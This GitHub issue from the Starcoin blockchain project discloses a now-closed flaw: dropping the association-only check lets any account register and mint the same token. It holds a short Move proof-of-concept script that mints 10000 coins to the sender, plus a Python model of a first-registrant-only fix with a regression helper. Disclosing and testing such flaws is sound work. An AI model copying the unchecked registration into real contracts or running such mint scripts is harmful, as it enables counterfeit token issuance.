starcoinorg / starcoin

Starcoin - A Move smart contract blockchain network that scales by layering
Apache License 2.0

Security vulnerability in multi-token #417

Closed guangyuz closed 4 years ago

guangyuz commented 4 years ago

Description: different accounts can issue the same token. Reason: originally there was a check in Libra::register that only the association can register a token. To support multi-token, we removed the check.

guangyuz commented 4 years ago

```
use 0x0::Starcoin;
use 0x0::Libra;
use 0x0::LibraAccount;
use 0x0::Transaction;

fun main() {
    let balance_old = LibraAccount::balance(Transaction::sender());
    Libra::register();
    let coin = Libra::mint(10000);
    Transaction::assert(Libra::value(&coin) == 10000, 8001);
    LibraAccount::deposit_to_sender(coin);
    let balance_new = LibraAccount::balance(Transaction::sender());
    Transaction::assert(balance_new == balance_old + 10000, 8003)
}
```
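The missing check described in this issue, as an added Python model (not Starcoin or Move code, and not from the issue's author). The class names, account strings, and `TokenX` are constructed, and the "first registrant becomes the only issuer" rule is an assumed fix that keeps multi-token support without reinstating the association-only check.

```python
class RegistrationError(Exception):
    """Raised when an account may not register or mint a token."""


class OpenRegistry:
    """Behaviour the issue describes: the association-only check is gone
    and nothing ties a token to the account that registered it."""

    def __init__(self):
        self.supply = {}  # token name -> total minted

    def register(self, sender, token):
        self.supply.setdefault(token, 0)  # any sender, any number of times

    def mint(self, sender, token, amount):
        self.supply[token] += amount  # no issuer check


class OwnedRegistry(OpenRegistry):
    """Assumed fix: the first registrant becomes the token's only issuer."""

    def __init__(self):
        super().__init__()
        self.issuer = {}  # token name -> registering account

    def register(self, sender, token):
        if token in self.issuer:
            raise RegistrationError(f"{token} already registered by {self.issuer[token]}")
        self.issuer[token] = sender
        super().register(sender, token)

    def mint(self, sender, token, amount):
        if self.issuer.get(token) != sender:
            raise RegistrationError(f"{sender} is not the issuer of {token}")
        super().mint(sender, token, amount)


def issue_from(registry, accounts, token="TokenX", amount=10000):
    """Each account runs register + mint; return who succeeded and the total supply."""
    succeeded = []
    for account in accounts:
        try:
            registry.register(account, token)
            registry.mint(account, token, amount)
            succeeded.append(account)
        except RegistrationError:
            pass  # rejected accounts add nothing to the supply
    return succeeded, registry.supply.get(token, 0)
```

Running `issue_from` against both registries with the same two accounts makes a regression test for the fix: the supply must reflect only the first registrant's mint.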